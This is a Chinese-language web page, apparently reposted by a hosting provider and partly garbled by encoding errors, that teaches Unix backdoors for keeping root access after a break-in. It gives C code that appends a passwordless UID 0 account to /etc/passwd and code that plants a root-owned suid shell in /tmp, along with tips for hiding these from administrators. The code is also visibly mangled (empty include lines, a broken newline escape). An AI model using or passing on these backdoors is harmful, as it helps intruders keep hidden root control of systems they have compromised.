|
最簡(jiǎn)單的方法��,就是在口令文件 passwd 中增加一個(gè) UID 為 0 的帳號(hào)。但最好別這么做,因?yàn)橹灰到y(tǒng)管理員檢查口令文件就會(huì)“漏餡”了。以下是在 /etc/passwd 口令文件中添加一個(gè) UID 0 帳號(hào)的C程序�����。
<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/shn");
}
<-->
比這種方法稍微隱蔽一點(diǎn)的就是將藏在口令文件中某個(gè)無(wú)人使用帳號(hào)的 UID 改為 0���,并將其第二個(gè)域(口令域)設(shè)為空。(注意����,如果你使用的是較高版本的*nix,也許還要修改 /etc/shadow 文件��。)
在 /tmp 目錄下放置 suid shell�。以后只要你運(yùn)行這個(gè)程序,就會(huì)輕易得到根用戶(hù)權(quán)限�。這種方法幾乎是最受歡迎的了。但有許多系統(tǒng)每幾小時(shí)�����,或者每次啟動(dòng)都會(huì)清除 /tmp 目錄下的數(shù)據(jù)�����,另外一些系統(tǒng)則根本不允許運(yùn)行 /tmp 目錄下的 suid 程序���。當(dāng)然����,你可以自己修改或清除這些限制(因?yàn)槟阋咽歉脩?hù)�,有權(quán)限修改 /var/spool/cron/crontabs/root 和 /etc/fstab 文件)。以下是在 /tmp 目錄下放置 suid shell 程序的C源程序��。
<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/fid");
system("chown root.root /tmp/fid");
system("chmod 4755 /tmp/fid");
}
<-->
億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話(huà):0371-63322206
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商�����!15年品質(zhì)保障�����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國(guó)服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
